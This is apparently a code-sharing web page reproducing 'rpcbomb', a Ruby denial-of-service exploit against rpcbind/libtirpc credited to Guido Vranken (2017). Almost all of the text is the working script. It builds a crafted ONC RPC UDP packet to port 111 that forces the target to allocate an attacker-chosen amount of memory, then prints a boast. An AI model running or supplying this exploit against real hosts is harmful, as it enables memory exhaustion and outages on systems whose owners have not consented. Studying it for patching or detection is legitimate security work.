扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 |
#!/usr/bin/ruby # # Source: https://raw.githubusercontent.com/guidovranken/rpcbomb/fe53048af2d4fb78c911e71a30f21afcffbbf5e1/rpcbomb.rb # # By Guido Vranken https://guidovranken.wordpress.com/ # Thanks to Sean Verity for writing an exploit in Ruby for an earlier # vulnerability: https://www.exploit-db.com/exploits/26887/ # I've used it as a template. require 'socket' def usage abort "\nusage: ./rpcbomb.rb <target> <# bytes to allocate> [port]\n\n" end bomb = """ + # , : @ @ @ @ @ @ @ @ ; . + @ @ @ . @ @ @ @ @ @ @ </code> @ @ . <code> @ # ; @ @ @ . : @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ ; @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ : # @ @ @ @ @ @ @ @ @ @ @ @ @ ' @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ . @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ + @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ + @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ : @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ , @ @ @ @ @ @ @ @ @ @ @ @ @ , @ @ @ @ @ @ @ @ @ @ @ ` @ @ @ @ @ @ @ @ @ , @ @ @ @ @ r p c b o m b DoS exploit for *nix rpcbind/libtirpc. (c) 2017 Guido Vranken. https://guidovranken.wordpress.com/ """ puts bomb if ARGV.length >= 2 begin host = ARGV[0] numBytes = Integer(ARGV[1]) port = ARGV.length == 3 ? Integer(ARGV[2]) : 111 rescue usage end pkt = [0].pack('N') # xid pkt << [0].pack('N')# message type CALL pkt << [2].pack('N')# RPC version 2 pkt << [100000].pack('N') # Program pkt << [4].pack('N')# Program version pkt << [9].pack('N')# Procedure pkt << [0].pack('N')# Credentials AUTH_NULL pkt << [0].pack('N')# Credentials length 0 pkt << [0].pack('N')# Credentials AUTH_NULL pkt << [0].pack('N')# Credentials length 0 pkt << [0].pack('N')# Program: 0 pkt << [0].pack('N')# Ver pkt << [4].pack('N')# Proc pkt << [4].pack('N')# Argument length pkt << [numBytes].pack('N') # Payload s = UDPSocket.new s.send(pkt, 0, host, port) sleep 1.5 begin s.recvfrom_nonblock(9000) rescue puts "No response from server received." exit() end puts "Allocated #{numBytes} bytes at host #{host}:#{port}.\n" + "\nDamn it feels good to be a gangster.\n\n" else usage end |
体验盒子
